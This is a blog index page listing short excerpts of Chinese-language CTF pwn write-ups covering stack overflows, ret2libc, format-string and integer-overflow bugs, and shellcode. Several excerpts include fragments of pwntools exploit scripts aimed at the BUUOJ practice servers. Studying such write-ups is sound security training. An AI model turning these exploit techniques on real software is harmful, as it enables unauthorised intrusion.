会员
众包
新闻
博问
闪存
赞助商
HarmonyOS
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
会员中心
简洁模式
...
退出登录
注册
登录
REPWNER
博客园
首页
新随笔
联系
订阅
管理
上一页
1
2
3
4
5
6
7
8
9
···
12
下一页
2022年7月1日
ez_pz_hackover_2016
摘要: 很好的动调入门 其他函数用处不大,直接看到chall函数 fget函数可以接收最长1023个字节的字符串,但是不足溢出,完全不够 看到vuln函数 很合理了,通过memcpy完成溢出,够了。啊对了 checksec一下,是没有保护的,所以我们可以嘿嘿嘿。想办法用shellcode. 那好,shell
阅读全文
posted @ 2022-07-01 20:33 REPWNER
阅读(30)
评论(0)
推荐(0)
2022年6月30日
jarvisoj_tell_me_something
摘要: 简单题就是没有ebp少加8个字节就好了。 点击查看代码 from pwn import * io=remote("node4.buuoj.cn",27315) payload='a'*0x88+p64(0x400620) io.sendline(payload) io.interactive()
阅读全文
posted @ 2022-06-30 15:31 REPWNER
阅读(7)
评论(0)
推荐(0)
pwn2_sctf_2016
摘要: 整数溢出漏洞。这里记住一个函数就get_n他是把有无符号数进行转换。可以说就是整数溢出的标志。 点击查看代码 from pwn import * from LibcSearcher import * context(os="linux",arch="i386") io=remote("node4.b
阅读全文
posted @ 2022-06-30 13:36 REPWNER
阅读(19)
评论(0)
推荐(0)
2022年6月29日
jarvisoj_fm
摘要: 遇到的第一道格式化字符串漏洞。 学习了很多。 有后门函数,这题就是把x改成4就可以了。利用点在于上面的第一个printf。 https://blog.csdn.net/qq_43394612/article/details/84900668?spm=1001.2101.3001.6650.1&utm
阅读全文
posted @ 2022-06-29 21:37 REPWNER
阅读(26)
评论(0)
推荐(0)
bjdctf_2020_babystack2
摘要: 这道题是我遇到的第一道整数溢出。很早就听说过这个原理,无符号和有符号数 -1对于有符号数来说就是-1,但是对于无符号数来说就想当于0x80000001,为什么就是二进制位给了个给符号,以至于少了极限的数呗。 有了这个铺垫,这道题就是很简单了。要小于10这是有符号数,放个-1就好了。然后对于后面来说我
阅读全文
posted @ 2022-06-29 19:27 REPWNER
阅读(22)
评论(1)
推荐(0)
bjdctf_2020_babyrop
摘要: 这道题也是经典的ret2libc 点击查看代码 from pwn import * from LibcSearcher import * io=remote("node4.buuoj.cn",25607) #io=process("./bjdctf_2020_babyrop") elf=ELF(".
阅读全文
posted @ 2022-06-29 13:29 REPWNER
阅读(14)
评论(0)
推荐(0)
铁人三项(第五赛区)_2018_rop
摘要: 最经典的ret2libc 点击查看代码 from pwn import * from LibcSearcher import * io=remote("node4.buuoj.cn",29696) elf=ELF("./2018_rop") write_plt=elf.plt["write"] wr
阅读全文
posted @ 2022-06-29 10:13 REPWNER
阅读(7)
评论(0)
推荐(0)
2022年6月28日
ciscn_2019_ne_5
摘要: 这道题反汇编好像有点问题,但后面不知道为啥又好了。很奇怪,知道的师傅可以说一下。 不管了,看到主程序 看逻辑的题目 看到22行,判断,这个得绕过,不然就结束了。第一个输入就用了,即p.sendline(b'administrator') get_flag这个函数是靠strcpy来导致栈溢出,可是sr
阅读全文
posted @ 2022-06-28 13:56 REPWNER
阅读(7)
评论(0)
推荐(0)
ciscn_2019_n_5
摘要: 一道简单的shellcode,因为没有开任何保护 看主程序 点一下name 一个完美的可读可写可执行段。那我们就可以利用第一个read去把shellcode读进去,第二个gets去溢出到name的地址上去执行shellcode。思路就是这样 点击查看代码 `context(arch='amd64',
阅读全文
posted @ 2022-06-28 11:41 REPWNER
阅读(7)
评论(0)
推荐(0)
not_the_same_3dsctf_2016
摘要: 题目解法很多,大概是理解了,大家可以指出错误 看下程序 一个mian,一个get_secret。 1.利用printf函数 每一个程序内的函数都可以化为己用。这里的思路就是利用主函数的gets函数完成栈溢出,返回到get_secret函数,然后再利用printf函数把fl4g打印出来 点击查看代码
阅读全文
posted @ 2022-06-28 11:13 REPWNER
阅读(68)
评论(0)
推荐(0)
上一页
1
2
3
4
5
6
7
8
9
···
12
下一页
公告